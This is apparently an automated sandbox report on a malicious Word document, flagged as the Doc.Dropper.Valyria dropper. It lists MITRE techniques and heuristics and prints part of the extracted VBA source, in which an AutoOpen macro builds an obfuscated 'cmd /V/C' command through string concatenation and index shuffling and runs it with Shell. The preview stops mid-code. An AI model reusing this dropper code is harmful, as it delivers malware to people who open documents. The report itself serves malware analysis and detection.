MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. The macro attempts to construct and execute a command using heavily obfuscated string concatenation, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Valyria-6666972-0' further supports its dropper functionality.
Heuristics 5
-
ClamAV: Doc.Dropper.Valyria-6666972-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6666972-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11578 bytes |
SHA-256: fe0bf169871a6e322def0afaa3ce4c99f2c29ea240bd19a77a2e5ac2d8a5553d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CNqWBCqCWY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Oct(trYjk)
TypeName Sgn(tDUZQ)
TypeName 329335345
TypeName 3746
TypeName 473682163
TypeName MoVwcN
Shell@ KeyString(vbKeyC) + zbCAiJj + fEoqCElO + poJvaFp + kUzJpMrDu + DPSrozWXnkF + zXbbXYvE + mrtdLlr + HoLrjMjT + vGwDommVncE + jfWdsY + YzljE + PvvUsTI + kLBYFOMCBQn, 288190133 - 288190133
TypeName ChrW(vUQknj)
TypeName vbYIQ
End Sub
Attribute VB_Name = "WJlciYmjonjHl"
Function poJvaFp()
On Error Resume Next
TypeName iwEwJT
TypeName tznkf
oHusoELkua = "m" + "d " + "/V/" + "C" + CStr(Chr(rzaVzVw + OaUzzWl + 34 + QwEqDBI + BawuTvBqzN)) + "s" + "et" + " ? "
TypeName 339338541
TypeName Tan(zJPOb * wRWiuF)
ElXrlYwpAB = " " + " =z" + "AG" + "AbC" + "Jtm" + "hRq" + "IQh" + "Vq" + "d(" + "pW" + "c=;"
TypeName Sqr(97097 / WInbzR * pXjWE * iQrTPk)
TypeName ChrW(294394521)
TypeName Round(95)
icVvIOiuzjJ = "." + "Nla" + "ui" + "v" + "x+3" + ":0P" + "'o7" + "e" + "6@s" + "}" + "ryw" + ",9" + "n-g"
TypeName Sgn(rSIhD + lZwOwP)
TypeName ChrB(131450292)
rkPqGFXr = "k" + "f\" + ")S" + "F" + "$" + " {" + "8Dj" + "/" + "&" + "&f" + "o" + "r"
TypeName 7404
TypeName Hex(aquasl - SCmzvD)
mnRwoFACvWj = " %" + "N " + "i" + "n (" + "1" + "9" + ";3" + "8;" + "47" + ";" + "40;" + "45;"
TypeName Rnd(3)
TypeName Atn(81954 + kiJolu)
TypeName CLng(95452 / RlBDM - 96160 - HGBXa)
UArHFOB = "4" + "3;" + "1" + "4;" + "4" + "0;" + "26"
TypeName 27433834
TypeName 72
EkLok = ";2" + "6" + ";6" + "0;" + "59" + ";" + "57;" + "2;" + "6" + ";2"
TypeName Round(ZjEGUL * ScDqL * 57447 - QFYzM)
TypeName Cos(duzSYA - mYwpw * 98481 - mUCQwZ)
TypeName wIcTNl
mzVbQzJaJn = "2;" + "5" + "0;" + "4" + "0" + ";4" + "7" + ";5"
TypeName Atn(nlokZ)
TypeName 342
TypeName Rpkzq
VQYmEf = "1;" + "38" + ";4;" + "64" + ";" + "40" + ";21"
poJvaFp = oHusoELkua + ElXrlYwpAB + icVvIOiuzjJ + rkPqGFXr + mnRwoFACvWj + UArHFOB + EkLok + mzVbQzJaJn + VQYmEf
TypeName Tan(478385079)
TypeName Fix(16818 / Cjovjn * 29453 / rXvPZl)
End Function
Function kUzJpMrDu()
On Error Resume Next
TypeName 8
TypeName Sin(62148 + RjNbcW)
TypeName WtiLN
vcBwskuzf = ";7;" + "60" + ";" + "25;" + "4" + "0;" + "7;2" + "4;"
TypeName Round(48953 * aYNaH * fiQVG * JPbnbn)
TypeName CInt(iKHhB)
TypeName Rnd(17756 + TKXMDO)
tzjTnBj = "20;" + "40" + ";4;" + "5;2" + "6;2"
TypeName Fix(25)
TypeName 3342
SzLmD = "9;4" + "0;" + "50" + ";7;" + "2" + "3;5" + "9" + ";" + "43" + ";57" + ";2;" + "2"
TypeName ChrB(lKEPXj)
TypeName dJMrs
TypeName Fix(707)
zVnYMsPbt = "2;3" + "7;1" + "4;7" + ";" + "7;"
TypeName ChrW(DkzCRK)
TypeName CByte(YbajBw)
FPjtvPIjHK = "1" + "9" + ";" + "34;" + "65;" + "65;" + "17;" + "29"
TypeName CDbl(WwCfP)
TypeName CLng(366432344)
TypeName Tan(wEnlwq - vwKMQ)
sKBlGjor = ";30" + ";" + "27" + ";45" + ";1" + "9;2" + "6" + ";2" + "8" + ";43" + ";24"
TypeName Log(10931 - lcooR)
TypeName Round(RvUsEz + 70388)
TypeName 6
cVkrELHMFU = ";21" + ";" + "3" + "8" + ";" + "8;" + "65" + ";25" + ";" + "39;" + "35" + ";4" + "2"
kUzJpMrDu = vcBwskuzf + tzjTnBj + SzLmD + zVnYMsPbt + FPjtvPIjHK + sKBlGjor + cVkrELHMFU
TypeName Tan(730)
TypeName Oct(LkkIj)
End Function
Function DPSrozWXnkF()
On Error Resume Next
TypeName CSng(GBGki)
TypeName Log(viuHm)
TypeName CDbl(sREmYK)
qnnwuF = ";" + "1" + "4;" + "7;7" + ";1" + "9" + ";34" + ";65"
TypeName 43
TypeName Atn(HVonhL - JqmfQ)
ZfQivCZ = ";65" + ";5" + "0" + ";27" + ";4" + "3;"
TypeName wKnmmz
TypeName Fix(YTdGc)
TypeName dBwzjW
GmTOsrVbTHW = "40;" + "51;" + "45;" + "38" + ";1" + "7;2" + "9;5" + "0;" + "27" + ";24"
TypeName Atn(kOcPN)
TypeName CDate(1364)
TypeName Fix(FvvmiW - uvGGj)
rVUYIa = ";21" + ";" + "0" + ";6" + "5;2" + "0
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.